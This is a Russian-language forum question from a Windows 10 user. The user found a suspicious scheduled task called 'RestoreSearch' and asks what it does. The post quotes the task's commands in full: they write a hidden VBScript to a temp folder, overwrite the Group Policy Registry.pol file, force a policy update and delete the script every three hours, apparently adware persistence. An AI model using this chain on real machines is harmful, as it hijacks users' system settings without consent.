Windows 10 Home Edition. С некоторых пор начал замечать раз в несколько часов какое-то странное мигание окна, как будто окно открылось и сразу закрылось. Стал копать, поиски привели меня в Task Sheduler, где я обнаружил вот такую подозрительную задачу:
Name:
RestoreSearch
Description:
Browser search setting
Actions:
cmd.exe /c @echo Set objShell = WScript.CreateObject("WScript.Shell") > %TEMP%\R.vbs
cmd.exe /c @echo objShell.Run "cmd.exe /c (attrib -H -R -S %WinDir%\system32\GroupPolicy\Machine\Registry.pol)&(copy/b/y %WinDir%\system32\GroupPolicy\Machine\R %WinDir%\system32\GroupPolicy\Machine\Registry.pol > nul)&(gpupdate/force)&(attrib +R %WinDir%\system32\GroupPolicy\Machine\Registry.pol)", 0, True >> %TEMP%\R.vbs
wscript.exe %TEMP%\R.vbs
cmd.exe /c del/Q %TEMP%\R.vbs
Запускается это каждые 3 часа.
В %WinDir%\system32\GroupPolicy\ ничего нет, поэтому, вероятно, ничего никуда не копируется.
На всякий случай я это отключил, но хотелось бы понять подробнее, что это такое?
Средний
